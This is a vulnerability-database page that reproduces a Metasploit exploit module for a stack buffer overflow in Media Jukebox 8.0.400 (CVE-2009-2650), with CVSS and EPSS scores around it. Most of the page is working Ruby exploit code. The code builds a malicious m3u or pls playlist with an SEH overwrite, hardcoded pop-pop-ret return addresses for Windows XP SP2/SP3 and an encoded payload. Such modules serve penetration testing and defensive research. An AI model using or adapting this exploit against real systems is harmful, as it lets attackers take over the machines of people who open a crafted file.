Lucene search

K
metasploitRon Henry <[email protected]>, dijital1MSF:EXPLOIT-WINDOWS-FILEFORMAT-MEDIAJUKEBOX-
HistoryDec 28, 2009 - 4:36 a.m.

Media Jukebox 8.0.400 Buffer Overflow (SEH)

2009-12-2804:36:25
Ron Henry <[email protected]>, dijital1
www.rapid7.com
11

CVSS2

9.3

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

COMPLETE

Integrity Impact

COMPLETE

Availability Impact

COMPLETE

AV:N/AC:M/Au:N/C:C/I:C/A:C

EPSS

0.967

Percentile

99.7%

This module exploits a stack buffer overflow in Media Jukebox 8.0.400 by creating a specially crafted m3u or pls file.

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::FILEFORMAT
  include Msf::Exploit::Remote::Seh

  def initialize(info = {})
    super(update_info(info,
      'Name' => 'Media Jukebox 8.0.400 Buffer Overflow (SEH)',
      'Description' => %q{
          This module exploits a stack buffer overflow in Media Jukebox 8.0.400
        by creating a specially crafted m3u or pls file.
      },
      'License' => MSF_LICENSE,
      'Author' =>
        [
          'Ron Henry <rlh[at]ciphermonk.net>',
          'dijital1',
        ],
      'References' =>
        [
          [ 'OSVDB', '55924' ],
          [ 'CVE', '2009-2650']
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'seh',
          'DisablePayloadHandler' => true
        },
      'Payload' =>
        {
          'Space' => 3000,
          'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c\x26\x3d\x2b\x3f\x3a\x3b\x2d\x2c\x2f\x23\x2e\x5c\x30",
          'StackAdjustment' => -3500,
        },
      'Platform' => 'win',
      'Targets' =>
        [
          [ 'Windows XP SP3 - English', { 'Ret' => 0x02951457} ], 		# 0x02951457 pop, pop, ret dsp_mjMain.dll
          [ 'Windows XP SP2 - English', { 'Ret' => 0x02291457} ], 		# 0x02291457 pop, pop, ret dsp_mjMain.dll
        ],
      'Privileged' => false,
      'DisclosureDate' => '2009-07-01',
      'DefaultTarget' => 0))

    register_options(
      [
        OptString.new('FILENAME', [ false, 'The file name.', 'metasploit.m3u']),
      ])
  end


  def exploit
    sploit = "\x68\x74\x74\x70\x3a\x2f\x2f" # "http://" trigger
    sploit << rand_text_alphanumeric(262)
    sploit << generate_seh_payload(target.ret)
    sploit << payload.encoded

    print_status("Creating '#{datastore['FILENAME']}' file ...")
    file_create(sploit)
  end
end

CVSS2

9.3

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

COMPLETE

Integrity Impact

COMPLETE

Availability Impact

COMPLETE

AV:N/AC:M/Au:N/C:C/I:C/A:C

EPSS

0.967

Percentile

99.7%

Related for MSF:EXPLOIT-WINDOWS-FILEFORMAT-MEDIAJUKEBOX-